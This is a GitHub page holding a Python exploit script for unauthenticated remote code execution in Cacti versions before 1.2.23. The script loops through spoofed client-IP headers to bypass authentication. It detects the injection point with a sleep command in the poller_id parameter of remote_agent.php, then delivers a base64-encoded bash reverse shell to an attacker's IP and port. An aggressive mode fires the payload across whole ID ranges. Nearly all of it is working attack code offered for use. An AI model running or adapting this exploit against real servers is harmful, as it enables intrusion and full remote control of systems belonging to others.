-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
168 lines (134 loc) · 7.3 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
# Exploit Title: Cacti - Unauthenticated Remote Code Execution
# Date: 08-04-2023
# Exploit Author: Jacob Ebben
# Version: Cacti < 1.2.23 and < 1.3.0
# Tested on: Cacti 1.2.22 on Debian Linux
#!/usr/bin/env python3
import argparse
import requests
import urllib3
import urllib.parse
import base64
from termcolor import colored
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def print_message(message, type):
if type == 'SUCCESS':
print('[' + colored('SUCCESS', 'green') + '] ' + message)
elif type == 'INFO':
print('[' + colored('INFO', 'blue') + '] ' + message)
elif type == 'WARNING':
print('[' + colored('WARNING', 'yellow') + '] ' + message)
elif type == 'ALERT':
print('[' + colored('ALERT', 'yellow') + '] ' + message)
elif type == 'ERROR':
print('[' + colored('ERROR', 'red') + '] ' + message)
class POC:
def __init__(self, target, ip, port, bypass_ip, max_host_id, max_data_id, proxy):
self.base_url = self._get_normalized_url(target)
self.payload = self._get_payload(ip, port)
self.proxies = self._get_proxies(self.base_url, proxy) if proxy else {}
self.bypass_ip = bypass_ip
self.max_host_id = max_host_id
self.max_data_id = max_data_id
self.session = requests.Session()
def exploit(self, bypass_header):
print_message("Starting exploitation ...", "INFO")
host_id, data_id = self._get_vulnerable_value(bypass_header)
if not host_id or not data_id:
print_message("Could not find a vulnerable value in the system!", "ERROR")
exit()
print_message("It appears that a vulnerable option was found!", "SUCCESS")
self._execute(host_id, data_id, bypass_header)
print_message("Triggered payload!", "INFO")
def aggressive_exploit(self, bypass_header):
print_message("Starting aggressive exploitation ...", "INFO")
print_message("In aggressive mode, the script will continue to run even after possible successful exploitation ...", "INFO")
for host_id in range(1, self.max_host_id + 1):
print_message(f"Attempting to find a vulnerable data_id for host_id {host_id} ...", "INFO")
for data_id in range(1, self.max_data_id + 1):
self._execute(host_id, data_id, bypass_header)
print_message("The entire range of host_ids and data_ids have been triggered ...", "INFO")
print_message("If the system is vulnerable, then the command should have executed ...", "INFO")
def get_bypass_header(self):
bypass_headers = [
'X-Forwarded-For',
'X-Client-IP',
'X-Real-IP',
'X-ProxyUser-Ip',
'CF-Connecting-IP',
'True-Client-IP',
'HTTP_X_FORWARDED',
'HTTP_X_FORWARDED_FOR',
'HTTP_X_CLUSTER_CLIENT_IP',
'HTTP_FORWARDED_FOR',
'HTTP_FORWARDED',
'HTTP_CLIENT_IP',
'REMOTE_ADDR'
]
for bypass_header in bypass_headers:
if self._is_vulnerable_header(bypass_header):
return bypass_header
return None
def _execute(self, host_id, data_id, bypass_header):
payload_url = self.base_url + f"remote_agent.php?action=polldata&local_data_ids[]={data_id}&host_id={host_id}&poller_id=`{self.payload}`"
headers = { bypass_header : self.bypass_ip }
response = self.session.get(payload_url, headers=headers, proxies=self.proxies)
def _get_vulnerable_value(self, bypass_header):
for host_id in range(1, self.max_host_id + 1):
print_message(f"Attempting to find a vulnerable data_id for host_id {host_id} ...", "INFO")
for data_id in range(1, self.max_data_id + 1):
if self._is_vulnerable_value(host_id, data_id, bypass_header):
return host_id, data_id
return None, None
def _is_vulnerable_value(self, host_id, data_id, bypass_header):
sleep_timer = 5
remote_agent_url = self.base_url + f"remote_agent.php?action=polldata&local_data_ids[]={data_id}&host_id={host_id}&poller_id=`sleep+{sleep_timer}`"
headers = { bypass_header : self.bypass_ip }
response = self.session.get(remote_agent_url, headers=headers, proxies=self.proxies)
return ('"rrd_name":"uptime"' in response.text or '"rrd_name":"polling_time"' in response.text) and response.elapsed.total_seconds() > sleep_timer
def _is_vulnerable_header(self, bypass_header):
remote_agent_url = self.base_url + "remote_agent.php"
headers = { bypass_header : self.bypass_ip }
response = self.session.get(remote_agent_url, headers=headers, proxies=self.proxies)
return "not authorized" not in response.text
def _get_payload(self, ip, port):
command = f'bash -c "exec bash -i &>/dev/tcp/{ip}/{port} <&1"'
command_bytes = command.encode('ascii')
command_base64 = base64.b64encode(command_bytes).decode('ascii')
payload = f"echo {command_base64} | base64 -d | bash"
return urllib.parse.quote(payload)
def _get_normalized_url(self, url):
if url[-1] != '/':
url += '/'
if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
url = "http://" + url
return url
def _get_proxies(self, target_url, proxy_url):
return {self._get_url_protocol(target_url): self._get_normalized_url(proxy_url)}
def _get_url_protocol(self, url):
if url[0:8].lower() == 'https://':
return 'https'
return 'http'
def main():
parser = argparse.ArgumentParser(description="Cacti - Unauthenticated Remote Code Execution")
parser.add_argument('-t', '--target', required=True, type=str, help="url of the vulnerable site (Example: \"http://127.0.0.1:8080\" or \"https://cacti.example.xyz/\")"),
parser.add_argument('-I', '--atk-ip', required=True, type=str, help='attacker ip for reverse shell'),
parser.add_argument('-P', '--atk-port', required=True, type=str, help='attacker port for reverse shell'),
parser.add_argument('-x', '--proxy', default=None, type=str, help='http proxy address (Example: http://127.0.0.1:8080/)'),
parser.add_argument('--bypass-ip', default='127.0.0.1', type=str, help='ip address to use for authentication bypass (Default: 127.0.0.1)'),
parser.add_argument('--max-host-id', default=10, type=int, help="number of host_id to try before stopping exploit (Default: 10)"),
parser.add_argument('--max-data-id', default=100, type=int, help="number of local_data_id to try before switching to different host (Default: 100)"),
parser.add_argument("--aggressive", action='store_true', help="skip vulnerability checks and attempt execution on every request")
args = parser.parse_args()
exploit = POC(args.target, args.atk_ip, args.atk_port, args.bypass_ip, args.max_host_id, args.max_data_id, args.proxy)
bypass_header = exploit.get_bypass_header()
if not bypass_header:
print_message("Could not bypass authentication!", "ERROR")
print_message("This installation might not be vulnerable, or try to change the bypass ip ...", "INFO")
exit()
if args.aggressive:
exploit.aggressive_exploit(bypass_header)
else:
exploit.exploit(bypass_header)
if __name__ == "__main__":
main()